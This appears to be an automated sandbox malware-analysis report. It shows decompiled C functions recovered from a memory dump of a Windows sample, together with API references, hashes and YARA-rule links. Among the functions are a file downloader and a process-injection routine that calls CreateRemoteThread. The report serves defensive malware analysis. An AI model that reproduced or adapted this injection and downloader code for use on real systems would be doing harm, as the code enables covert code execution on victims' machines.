Instruction ID: a2b387e6c3f2b2097603f1b6efffffb2ab2b9564046f8741a7beb415e4b781ed
Opcode Fuzzy Hash: e8b792806ecff0397917da2d5b05e3786dabf06989889367a4a844a6ee7f2b2c
Instruction Fuzzy Hash: 1C21C472908344ABD230EBA5DD0AFDB779CEB84315F00092BB548E7191DB78A605CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 0040E004, Relevance: 9.1, APIs: 6, Instructions: 74
filesynchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E004(void* _a4, WCHAR* _a8, intOrPtr _a12, void* _a16) {
				char _v5;
				long _v12;
				struct _OVERLAPPED* _v16;
				void* _v20;
				long _v24;
				void* _t28;
				long _t37;
				void* _t41;

				_v5 = 0;
				_t41 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
				if(_t41 == 0xffffffff) {
					L15:
					return _v5;
				}
				_t28 = E0040C192(0x1000);
				_v20 = _t28;
				if(_t28 == 0) {
					L13:
					CloseHandle(_t41);
					if(_v5 == 0) {
						E0041151D(_a8);
					}
					goto L15;
				}
				_v16 = 0;
				while(_a16 == 0 || WaitForSingleObject(_a16, 0) == 0x102) {
					if(InternetReadFile(_a4, _v20, 0x1000,  &_v12) == 0) {
						break;
					}
					if(_v12 == 0) {
						FlushFileBuffers(_t41);
						_v5 = 1;
						break;
					}
					if(WriteFile(_t41, _v20, _v12,  &_v24, 0) == 0) {
						break;
					}
					_t37 = _v12;
					if(_t37 != _v24) {
						break;
					}
					_v16 = _v16 + _t37;
					if(_v16 <= _a12) {
						continue;
					}
					break;
				}
				E0040C1C2(_v20);
				goto L13;
			}

0x0040e021
0x0040e02a
0x0040e02f
0x0040e0cf
0x0040e0d5
0x0040e0d5
0x0040e03a
0x0040e03f
0x0040e044
0x0040e0bb
0x0040e0bc
0x0040e0c5
0x0040e0ca
0x0040e0ca
0x00000000
0x0040e0c5
0x0040e046
0x0040e049
0x0040e076
0x00000000
0x00000000
0x0040e07b
0x0040e0a9
0x0040e0af
0x00000000
0x0040e0af
0x0040e091
0x00000000
0x00000000
0x0040e093
0x0040e099
0x00000000
0x00000000
0x0040e09b
0x0040e0a4
0x00000000
0x00000000
0x00000000
0x0040e0a6
0x0040e0b6
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,?,?,?,00000000), ref: 0040E024
WaitForSingleObject.KERNEL32(?,00000000), ref: 0040E052
InternetReadFile.WININET(00001000,?,00001000,?), ref: 0040E06E
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040E089
FlushFileBuffers.KERNEL32(00000000), ref: 0040E0A9
CloseHandle.KERNEL32(00000000), ref: 0040E0BC

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: File$BuffersCloseCreateFlushHandleInternetObjectReadSingleWaitWrite
String ID:
API String ID: 3509176705-0
Opcode ID: 5de04a6b89d19367334631d59ad8a9c3532827fc7105cb5073cd915f8d6201e9
Instruction ID: a525eba66cb21ea5fe2c98013379fe17f1e39bc58b487200e5ba5f0e6f07f869
Opcode Fuzzy Hash: 5de04a6b89d19367334631d59ad8a9c3532827fc7105cb5073cd915f8d6201e9
Instruction Fuzzy Hash: 3421AF31900219BFDF11AFA1CD84AAF7B7AFB00301F10497AF511B22E1C3B98D659B29

Uniqueness

Uniqueness Score: -1.00%

Function 004108F7, Relevance: 9.1, APIs: 6, Instructions: 72
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E004108F7(int __ecx, intOrPtr* __edx, struct tagPOINT _a4, signed int _a8) {
				intOrPtr* _v8;
				long _v12;
				struct HWND__* _v16;
				int _v20;
				struct HWND__* _v24;
				long _t24;
				struct HWND__* _t33;
				intOrPtr* _t44;

				_push(_a8);
				_t44 = __edx;
				_v8 = __edx;
				_v20 = __ecx;
				_t33 = WindowFromPoint(_a4.x);
				if(_t33 != 0) {
					if(SendMessageTimeoutW(_t33, 0x84, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4.x & 0x0000ffff, 2, _v20,  &_v12) != 0) {
						_t24 = _v12;
						if(_t24 != 0xffffffff) {
							if(_t44 != 0) {
								 *_t44 = _t24;
							}
						} else {
							_v16 = _t33;
							SetWindowLongW(_t33, 0xfffffff0, GetWindowLongW(_t33, 0xfffffff0) | 0x08000000);
							_t33 = E004108F7(_v20, _v8, _a4, _a8);
							SetWindowLongW(_v24, 0xfffffff0, GetWindowLongW(_v24, 0xfffffff0) & 0xf7ffffff);
						}
					} else {
						_t33 = 0;
					}
				}
				return _t33;
			}

0x00410903
0x00410906
0x0041090b
0x0041090f
0x00410919
0x0041091d
0x0041094c
0x00410952
0x00410959
0x004109aa
0x004109ac
0x004109ac
0x0041095b
0x00410964
0x00410979
0x00410994
0x004109a4
0x004109a4
0x0041094e
0x0041094e
0x0041094e
0x0041094c
0x004109b6

APIs

WindowFromPoint.USER32(?,?,00000000,?,?,?,00000000), ref: 00410913
SendMessageTimeoutW.USER32 ref: 00410944
GetWindowLongW.USER32(00000000,000000F0), ref: 00410968
SetWindowLongW.USER32 ref: 00410979
GetWindowLongW.USER32(?,000000F0), ref: 00410996
SetWindowLongW.USER32 ref: 004109A4

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Window$Long$FromMessagePointSendTimeout
String ID:
API String ID: 2645164282-0
Opcode ID: a45180b40cf10b14eb405651210357b020888a67d79b083f215a2481802641ac
Instruction ID: 4ba56e105de5fb0f0cce4d1f5091a9db8441476da3f937a5079a897d9797faea
Opcode Fuzzy Hash: a45180b40cf10b14eb405651210357b020888a67d79b083f215a2481802641ac
Instruction Fuzzy Hash: CB21A871518316ABE7109F25CC40E6B7B98EB84730F20472AFDE4963F2D674D9848B95

Uniqueness

Uniqueness Score: -1.00%

Function 004108F7, Relevance: 9.1, APIs: 6, Instructions: 72
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E004108F7(int __ecx, intOrPtr* __edx, struct tagPOINT _a4, signed int _a8) {
				intOrPtr* _v8;
				long _v12;
				struct HWND__* _v16;
				int _v20;
				struct HWND__* _v24;
				long _t24;
				struct HWND__* _t33;
				intOrPtr* _t44;

				_push(_a8);
				_t44 = __edx;
				_v8 = __edx;
				_v20 = __ecx;
				_t33 = WindowFromPoint(_a4.x);
				if(_t33 != 0) {
					if(SendMessageTimeoutW(_t33, 0x84, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4.x & 0x0000ffff, 2, _v20,  &_v12) != 0) {
						_t24 = _v12;
						if(_t24 != 0xffffffff) {
							if(_t44 != 0) {
								 *_t44 = _t24;
							}
						} else {
							_v16 = _t33;
							SetWindowLongW(_t33, 0xfffffff0, GetWindowLongW(_t33, 0xfffffff0) | 0x08000000);
							_t33 = E004108F7(_v20, _v8, _a4, _a8);
							SetWindowLongW(_v24, 0xfffffff0, GetWindowLongW(_v24, 0xfffffff0) & 0xf7ffffff);
						}
					} else {
						_t33 = 0;
					}
				}
				return _t33;
			}

APIs

WindowFromPoint.USER32(?,?,00000000,?,?,?,00000000), ref: 00410913
SendMessageTimeoutW.USER32 ref: 00410944
GetWindowLongW.USER32(00000000,000000F0), ref: 00410968
SetWindowLongW.USER32 ref: 00410979
GetWindowLongW.USER32(?,000000F0), ref: 00410996
SetWindowLongW.USER32 ref: 004109A4

Memory Dump Source

Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: Window$Long$FromMessagePointSendTimeout
String ID:
API String ID: 2645164282-0
Opcode ID: a45180b40cf10b14eb405651210357b020888a67d79b083f215a2481802641ac
Instruction ID: 4ba56e105de5fb0f0cce4d1f5091a9db8441476da3f937a5079a897d9797faea
Opcode Fuzzy Hash: a45180b40cf10b14eb405651210357b020888a67d79b083f215a2481802641ac
Instruction Fuzzy Hash: CB21A871518316ABE7109F25CC40E6B7B98EB84730F20472AFDE4963F2D674D9848B95

Uniqueness

Uniqueness Score: -1.00%

Function 004113D7, Relevance: 9.1, APIs: 6, Instructions: 68
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E004113D7(signed int __eax, void* __ecx, void** __esi, long _a4) {
				intOrPtr _v8;
				long _v12;
				void* _t19;
				void* _t20;
				long _t22;
				void* _t23;

				_t33 = __esi;
				asm("sbb eax, eax");
				_t19 = CreateFileW(_a4, 0x80000000,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
				__esi[2] = _t19;
				if(_t19 == 0xffffffff) {
					L11:
					_t20 = 0;
				} else {
					__imp__GetFileSizeEx(_t19,  &_v12);
					if(_t19 == 0 || _v8 != 0) {
						L10:
						CloseHandle(_t33[2]);
						goto L11;
					} else {
						_t22 = _v12;
						__esi[1] = _t22;
						if(_t22 != 0) {
							_t23 = VirtualAlloc(0, _t22, 0x3000, 4);
							 *__esi = _t23;
							if(_t23 == 0) {
								goto L10;
							} else {
								if(ReadFile(__esi[2], _t23, __esi[1],  &_a4, 0) == 0 || _a4 != __esi[1]) {
									VirtualFree( *_t33, 0, 0x8000);
									goto L10;
								} else {
									goto L5;
								}
							}
						} else {
							 *__esi = 0;
							L5:
							_t20 = 1;
						}
					}
				}
				return _t20;
			}

0x004113d7
0x004113ea
0x004113fc
0x00411402
0x00411408
0x00411478
0x00411478
0x0041140a
0x0041140f
0x00411417
0x0041146f
0x00411472
0x00000000
0x0041141e
0x0041141e
0x00411421
0x00411426
0x00411437
0x0041143d
0x00411441
0x00000000
0x00411443
0x00411457
0x00411469
0x00000000
0x00000000
0x00000000
0x00000000
0x00411457
0x00411428
0x00411428
0x0041142a
0x0041142a
0x0041142a
0x00411426
0x00411417
0x0041147c

APIs

CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,00413996,?,?,00000000), ref: 004113FC
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00413996,?,?,00000000), ref: 0041140F
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,00413996,?,?,00000000), ref: 00411437
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00413996,?,?,00000000), ref: 0041144F
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00413996,?,?,00000000), ref: 00411469
CloseHandle.KERNEL32(?,?,?,?,?,00413996,?,?,00000000), ref: 00411472

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 1974014688-0
Opcode ID: 9bd8a21221b8eb69d62a3331e990ceae85258be0999293c370e88b842d9085f3
Instruction ID: 397498b1218c3a8f66a40828a3cc2d78444f2d193c240055eb01a7fcf2f43caa
Opcode Fuzzy Hash: 9bd8a21221b8eb69d62a3331e990ceae85258be0999293c370e88b842d9085f3
Instruction Fuzzy Hash: 87118275100600BFEB214F21DC49EAB7BB9EB55B10B10892DF696E61B0D775A981CB28

Uniqueness

Uniqueness Score: -1.00%

Function 0041D6E5, Relevance: 9.1, APIs: 6, Instructions: 54
synchronizationthreadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041D6E5(void* __ecx, long _a4, intOrPtr _a8) {
				char _v5;
				void* __edi;
				void* __esi;
				void* _t10;
				void* _t14;
				void* _t23;
				void* _t25;
				void* _t26;

				_t21 = __ecx;
				_push(__ecx);
				_v5 = 0;
				_t23 = OpenProcess(0x47a, 0, _a4);
				_t28 = _t23;
				if(_t23 != 0) {
					_push(_t25);
					_t10 = E004131B6(_t21, _t23, _t25, _t28, _a8, 0);
					_t26 = _t10;
					if(_t26 != 0) {
						_t14 = CreateRemoteThread(_t23, 0, 0, _t10 -  *0x4238b4 + E00413966, 0, 0, 0);
						_a4 = _t14;
						if(_t14 == 0) {
							VirtualFreeEx(_t23, _t26, 0, 0x8000);
						} else {
							WaitForSingleObject(_t14, 0x2710);
							CloseHandle(_a4);
							_v5 = 1;
						}
					}
					CloseHandle(_t23);
				}
				return _v5;
			}

0x0041d6e5
0x0041d6e8
0x0041d6f6
0x0041d6ff
0x0041d701
0x0041d703
0x0041d705
0x0041d70a
0x0041d70f
0x0041d713
0x0041d727
0x0041d72d
0x0041d732
0x0041d757
0x0041d734
0x0041d73a
0x0041d743
0x0041d749
0x0041d749
0x0041d732
0x0041d75e
0x0041d764
0x0041d76b

APIs

OpenProcess.KERNEL32(0000047A,00000000,0001FEE6,00000000,0001FEE6,?,?,0041D8A7,?,?,00000000), ref: 0041D6F9
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-0083721A,00000000,00000000,00000000), ref: 0041D727
WaitForSingleObject.KERNEL32(00000000,00002710,?,0041D8A7,?,?,00000000), ref: 0041D73A
CloseHandle.KERNEL32(0001FEE6,?,0041D8A7,?,?,00000000), ref: 0041D743
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,0041D8A7,?,?,00000000), ref: 0041D757
CloseHandle.KERNEL32(00000000,?,00000000,?,?,0041D8A7,?,?,00000000), ref: 0041D75E

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseHandle$CreateFreeObjectOpenProcessRemoteSingleThreadVirtualWait
String ID:
API String ID: 14861764-0
Opcode ID: cd2152dd7656f8048059b3ee3b471b59a9a02bd3c3688b58f383d56308ca243a
Instruction ID: 913c21e63c97e327a6d5f25f35db06ed154b0a7f2cb93bcf8f18adfe9c89d4b6
Opcode Fuzzy Hash: cd2152dd7656f8048059b3ee3b471b59a9a02bd3c3688b58f383d56308ca243a
Instruction Fuzzy Hash: 5C01B1B2508248BFE7112F64DDCCEFF3E6CDB497A5B044069F601A6160C6794D868679

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA81, Relevance: 9.1, APIs: 6, Instructions: 54
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040AA81(struct HWND__* _a4, struct HRGN__* _a8, int _a12) {
				void* _t21;
				int _t22;
				signed int _t23;
				struct HWND__* _t27;
				char* _t31;

				_t27 = _a4;
				if(( *0x4238a0 & 0x00000004) == 0 || E004132A1() == 0) {
					L7:
					return GetUpdateRgn(_t27, _a8, _a12);
				} else {
					_t31 = TlsGetValue( *0x423e84);
					if(_t31 == 0 || _t27 !=  *((intOrPtr*)(_t31 + 4))) {
						goto L7;
					} else {
						SetRectRgn(_a8,  *(_t31 + 0xc),  *(_t31 + 0x10),  *(_t31 + 0x14),  *(_t31 + 0x18));
						if(_a12 != 0) {
							_t22 = SaveDC( *(_t31 + 8));
							_t23 = SendMessageW(_t27, 0x14,  *(_t31 + 8), 0);
							asm("sbb eax, eax");
							 *((intOrPtr*)(_t31 + 0x1c)) =  ~_t23 + 1;
							RestoreDC( *(_t31 + 8), _t22);
						}
						 *_t31 = 1;
						_t21 = 2;
						return _t21;
					}
				}
			}

0x0040aa8c
0x0040aa90
0x0040ab02
0x00000000
0x0040aa9b
0x0040aaa7
0x0040aaab
0x00000000
0x0040aab2
0x0040aac1
0x0040aacb
0x0040aad1
0x0040aae1
0x0040aae9
0x0040aaf0
0x0040aaf3
0x0040aaf9
0x0040aafc
0x0040aaff
0x00000000
0x0040aaff
0x0040aaab

APIs

GetUpdateRgn.USER32 ref: 0040AB09

Part of subcall function 004132A1: WaitForSingleObject.KERNEL32(00000000,00407D52,00000310,00000000,00000310,909011A5,00000002), ref: 004132A9

TlsGetValue.KERNEL32 ref: 0040AAA1
SetRectRgn.GDI32(?,?,?,?,?), ref: 0040AAC1
SaveDC.GDI32(?), ref: 0040AAD1
SendMessageW.USER32(?,00000014,?,00000000), ref: 0040AAE1
RestoreDC.GDI32(?,00000000), ref: 0040AAF3

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
String ID:
API String ID: 3142230470-0
Opcode ID: d77714f24e56bfa60ba8508e97fde677f7d74fdf6fa772479a1b81748a329343
Instruction ID: e34874618b23d694526dd9b039755d9cd8fc9c3635f83db03c8ebf5feab68804
Opcode Fuzzy Hash: d77714f24e56bfa60ba8508e97fde677f7d74fdf6fa772479a1b81748a329343
Instruction Fuzzy Hash: D0117031100741EFCB329F60DD49E97BBB6FB04711F004929FA86A25B1C775A864DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00414B25, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 303
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00414B25(void* __edx, intOrPtr _a4) {
				signed int _v12;
				int _v16;
				void* _v20;
				int _v24;
				signed int _v28;
				int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v74;
				intOrPtr _v78;
				char _v80;
				struct _SYSTEMTIME _v96;
				char _v112;
				short _v184;
				short _v288;
				void* __ebx;
				void* __esi;
				signed int _t127;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t140;
				signed int _t142;
				signed int _t143;
				signed int _t151;
				signed int _t155;
				signed int _t159;
				signed char _t163;
				signed int _t167;
				signed int _t176;
				signed int _t177;
				signed int _t186;
				long _t191;
				long _t195;
				signed int _t201;
				void* _t202;
				signed int _t203;
				signed int _t208;
				signed int _t211;
				signed int _t212;
				signed int _t219;
				short* _t230;
				signed int _t238;
				intOrPtr _t239;
				void* _t244;

				_t239 = _a4;
				_t126 =  *((intOrPtr*)(_t239 + 0x40));
				if( *((intOrPtr*)(_t239 + 0x40)) != 0) {
					_t127 = E00411D2E( &_v12, __edx, __eflags, _t126, 0x4e27, 0x10000000);
					 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
					 *(_t239 + 0x38) =  *(_t239 + 0x38) & 0x00000000;
					_t238 = _t127;
					_v64 = _t238;
					__eflags = _t238;
					if(_t238 == 0) {
						L55:
						E0040C1C2(_v64);
						__eflags = 0 -  *(_t239 + 0x3c);
						asm("sbb eax, eax");
						return  ~0x00000000;
					}
					_t131 = _v12;
					__eflags = _t131 - 0x10;
					if(_t131 <= 0x10) {
						goto L55;
					}
					__eflags =  *((char*)(_t239 + 0x18)) - 1;
					_v16 = 1;
					_t132 = _t131 + _t238;
					__eflags = _t132;
					_v28 = ((0 |  *((char*)(_t239 + 0x18)) != 0x00000001) - 0x00000001 & 0xffffffe0) + 0x00000040 & 0x0000ffff;
					_v12 = _t132;
					while(1) {
						_t133 =  *(_t238 + 2) & 0x0000ffff;
						__eflags = _t133 - 0x10;
						if(_t133 < 0x10) {
							goto L55;
						}
						_t219 =  *(_t238 + 4) & 0x0000ffff;
						__eflags = _t219 - _t133;
						if(_t219 >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 6) - _t133;
						if( *(_t238 + 6) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 8) - _t133;
						if( *(_t238 + 8) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 0xa) - _t133;
						if( *(_t238 + 0xa) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 0xc) - _t133;
						if( *(_t238 + 0xc) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 0xe) - _t133;
						if( *(_t238 + 0xe) >= _t133) {
							goto L55;
						}
						_t134 =  *_t238 & 0x0000ffff;
						_t208 = _t134 >> 0x00000009 & 0x00000008;
						_t220 = _t238 + _t219;
						__eflags = (_t134 & _v28) - _v28;
						if((_t134 & _v28) != _v28) {
							L48:
							_t238 = _t238 + ( *(_t238 + 2) & 0x0000ffff);
							_t102 = _t238 + 0x10; // 0x10
							__eflags = _t102 - _v12;
							if(_t102 > _v12) {
								goto L55;
							}
							__eflags = ( *(_t238 + 2) & 0x0000ffff) + _t238 - _v12;
							if(( *(_t238 + 2) & 0x0000ffff) + _t238 > _v12) {
								goto L55;
							}
							_v16 = _v16 + 1;
							continue;
						}
						_t234 = _t208;
						_t140 = E00414802(_t220, _t208,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)));
						__eflags = _t140;
						if(_t140 == 0) {
							goto L48;
						}
						_t141 =  *(_t239 + 0x44);
						__eflags =  *(_t239 + 0x44);
						if(__eflags == 0) {
							L16:
							_t142 =  *(_t238 + 8) & 0x0000ffff;
							__eflags = _t142;
							if(_t142 == 0) {
								L18:
								_t143 =  *(_t238 + 0xa) & 0x0000ffff;
								__eflags = _t143;
								if(_t143 == 0) {
									L20:
									__eflags =  *_t238 & 0x00000010;
									if(( *_t238 & 0x00000010) == 0) {
										L31:
										E0040C275( &_v60,  &_v60, 0, 0x1c);
										_v60 =  *_t238 & 0x0000ffff;
										_t209 = _t208 | 0xffffffff;
										_v56 = E0040C620(_t208 | 0xffffffff, ( *(_t238 + 4) & 0x0000ffff) + _t238);
										_t151 =  *(_t238 + 6) & 0x0000ffff;
										__eflags = _t151;
										if(_t151 != 0) {
											__eflags = _t151 + _t238;
											_v52 = E0040C620(_t209, _t151 + _t238);
										} else {
											_v52 = _v52 & 0x00000000;
										}
										_t155 =  *(_t238 + 0xc) & 0x0000ffff;
										__eflags = _t155;
										if(_t155 != 0) {
											__eflags = _t155 + _t238;
											_v48 = E0040C620(_t209, _t155 + _t238);
										} else {
											_v48 = _v48 & 0x00000000;
										}
										_t159 =  *(_t238 + 0xe) & 0x0000ffff;
										__eflags = _t159;
										if(_t159 != 0) {
											__eflags = _t159 + _t238;
											_v44 = E0040C620(_t209, _t159 + _t238);
										} else {
											_v44 = _v44 & 0x00000000;
										}
										_t163 =  *_t238 & 0x0000ffff;
										__eflags = _t163 & 0x00000003;
										if((_t163 & 0x00000003) != 0) {
											E00415A65( *(_t239 + 0x3c),  *(_t239 + 0x38));
											 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
											_t167 = E0040C215(__eflags,  &_v60, 0x1c);
											 *(_t239 + 0x38) = _t167;
											__eflags = _t167;
											if(_t167 == 0) {
												E00415A3C( &_v60);
												_t239 = _a4;
											} else {
												 *(_t239 + 0x3c) =  *(_t239 + 0x3c) + 1;
											}
											goto L55;
										} else {
											__eflags = _t163 & 0x0000000c;
											if(__eflags == 0) {
												E00415A3C( &_v60);
												L47:
												_t239 = _a4;
												goto L48;
											}
											_t211 = E00411D2E( &_v36, _t234, __eflags,  *((intOrPtr*)(_t239 + 0x40)), _v16, 0x40000000);
											_v40 = _t211;
											__eflags = _t211;
											if(_t211 == 0) {
												L54:
												E0040C1C2(_t211);
												E00415A3C( &_v60);
												_t239 = _a4;
												E00415A65( *(_t239 + 0x3c),  *((intOrPtr*)(_a4 + 0x38)));
												_t122 = _t239 + 0x3c;
												 *_t122 =  *(_t239 + 0x3c) & 0x00000000;
												__eflags =  *_t122;
												goto L55;
											}
											_t176 = E00412400(_t211, _v36);
											__eflags = _t176;
											if(_t176 == 0) {
												goto L54;
											}
											_t177 = E0040C14D(( *(_t239 + 0x3c) + 1) * 0x1c, _t239 + 0x38);
											__eflags = _t177;
											if(_t177 == 0) {
												goto L54;
											}
											 *(_a4 + 0x3c) =  *(_a4 + 0x3c) + 1;
											E0040C1FE( *(_a4 + 0x3c) * 0x1c +  *((intOrPtr*)(_t178 + 0x38)),  &_v60, 0x1c);
											goto L47;
										}
									}
									__eflags =  *(_t238 + 0xc);
									if( *(_t238 + 0xc) <= 0) {
										goto L31;
									}
									E0041352A( &_v184, _t220, 1,  &_v288);
									_t186 = E0040D467( &_v112, ( *(_t238 + 0xc) & 0x0000ffff) + _t238, E0040CCFF(( *(_t238 + 0xc) & 0x0000ffff) + _t238));
									__eflags = _t186;
									if(_t186 == 0) {
										goto L48;
									}
									_t230 =  &_v184;
									_t212 = 0;
									__eflags = 0;
									do {
										E0040C52A( *((intOrPtr*)(_t244 + _t212 - 0x6c)), _t230);
										_t212 = _t212 + 1;
										_t230 = _t230 + 4;
										__eflags = _t212 - 0x10;
									} while (_t212 < 0x10);
									_v32 = _v32 | 0xffffffff;
									_t208 = 0x10;
									 *_t230 = 0;
									_v24 = _t208;
									_v20 = 0x80000001;
									_t191 = RegOpenKeyExW(0x80000001,  &_v288, 0, 1,  &_v20);
									__eflags = _t191;
									if(_t191 != 0) {
										goto L31;
									}
									_t195 = RegQueryValueExW(_v20,  &_v184, 0, 0,  &_v80,  &_v24);
									__eflags = _t195;
									if(_t195 == 0) {
										_v32 = _v24;
									}
									RegCloseKey(_v20);
									__eflags = _v32 - _t208;
									if(_v32 == _t208) {
										GetLocalTime( &_v96);
										__eflags = _v74 - _v96.wDay;
										if(_v74 != _v96.wDay) {
											goto L31;
										}
										__eflags = _v78 - _v96.wMonth;
										if(_v78 == _v96.wMonth) {
											goto L48;
										}
									}
									goto L31;
								}
								_t220 = _t238 + _t143;
								_t201 = E00414837(_t238 + _t143,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
								__eflags = _t201;
								if(_t201 == 0) {
									goto L48;
								}
								goto L20;
							}
							_t220 = _t238 + _t142;
							_t202 = E00414837(_t238 + _t142,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
							__eflags = _t202 - 1;
							if(_t202 == 1) {
								goto L48;
							}
							goto L18;
						}
						_t203 = E00414ABD(_t220, _t234, __eflags, 4, _t141,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)), _t208);
						__eflags = _t203;
						if(_t203 != 0) {
							goto L48;
						}
						goto L16;
					}
					goto L55;
				}
				return 0;
			}

0x00414b30
0x00414b33
0x00414b39
0x00414b50
0x00414b55
0x00414b59
0x00414b5d
0x00414b5f
0x00414b62
0x00414b64
0x00414ec7
0x00414eca
0x00414ed1
0x00414ed4
0x00000000
0x00414ed6
0x00414b6a
0x00414b6d
0x00414b70
0x00000000
0x00000000
0x00414b78
0x00414b7c
0x00414b90
0x00414b90
0x00414b92
0x00414b95
0x00414b98
0x00414b98
0x00414b9c
0x00414b9f
0x00000000
0x00000000
0x00414ba5
0x00414ba9
0x00414bac
0x00000000
0x00000000
0x00414bb2
0x00414bb6
0x00000000
0x00000000
0x00414bbc
0x00414bc0
0x00000000
0x00000000
0x00414bc6
0x00414bca
0x00000000
0x00000000
0x00414bd0
0x00414bd4
0x00000000
0x00000000
0x00414bda
0x00414bde
0x00000000
0x00000000
0x00414be4
0x00414bef
0x00414bf2
0x00414bf5
0x00414bf9
0x00414e51
0x00414e55
0x00414e57
0x00414e5a
0x00414e5d
0x00000000
0x00000000
0x00414e65
0x00414e68
0x00000000
0x00000000
0x00414e6a
0x00000000
0x00414e6a
0x00414c02
0x00414c07
0x00414c0c
0x00414c0e
0x00000000
0x00000000
0x00414c14
0x00414c17
0x00414c19
0x00414c32
0x00414c32
0x00414c36
0x00414c39
0x00414c51
0x00414c51
0x00414c55
0x00414c58
0x00414c70
0x00414c70
0x00414c73
0x00414d57
0x00414d5f
0x00414d67
0x00414d71
0x00414d7b
0x00414d7e
0x00414d82
0x00414d85
0x00414d8d
0x00414d97
0x00414d87
0x00414d87
0x00414d87
0x00414d9a
0x00414d9e
0x00414da1
0x00414da9
0x00414db3
0x00414da3
0x00414da3
0x00414da3
0x00414db6
0x00414dba
0x00414dbd
0x00414dc5
0x00414dcf
0x00414dbf
0x00414dbf
0x00414dbf
0x00414dd2
0x00414dd5
0x00414dd7
0x00414e78
0x00414e7d
0x00414e87
0x00414e8c
0x00414e8f
0x00414e91
0x00414e9b
0x00414ea0
0x00414e93
0x00414e93
0x00414e93
0x00000000
0x00414ddd
0x00414ddd
0x00414ddf
0x00414e49
0x00414e4e
0x00414e4e
0x00000000
0x00414e4e
0x00414df4
0x00414df6
0x00414df9
0x00414dfb
0x00414ea5
0x00414ea6
0x00414eae
0x00414eb9
0x00414ebe
0x00414ec3
0x00414ec3
0x00414ec3
0x00000000
0x00414ec3
0x00414e06
0x00414e0b
0x00414e0d
0x00000000
0x00000000
0x00414e1d
0x00414e22
0x00414e24
0x00000000
0x00000000
0x00414e35
0x00414e3f
0x00000000
0x00414e3f
0x00414dd7
0x00414c79
0x00414c7e
0x00000000
0x00000000
0x00414c93
0x00414ca9
0x00414cae
0x00414cb0
0x00000000
0x00000000
0x00414cb6
0x00414cbc
0x00414cbc
0x00414cbe
0x00414cc2
0x00414cc7
0x00414cc8
0x00414ccb
0x00414ccb
0x00414cd0
0x00414cd6
0x00414cd9
0x00414cf1
0x00414cf4
0x00414cf7
0x00414cfd
0x00414cff
0x00000000
0x00000000
0x00414d17
0x00414d1d
0x00414d1f
0x00414d24
0x00414d24
0x00414d2a
0x00414d30
0x00414d33
0x00414d39
0x00414d43
0x00414d47
0x00000000
0x00000000
0x00414d4d
0x00414d51
0x00000000
0x00000000
0x00414d51
0x00000000
0x00414d33
0x00414c5d
0x00414c63
0x00414c68
0x00414c6a
0x00000000
0x00000000
0x00000000
0x00414c6a
0x00414c3e
0x00414c44
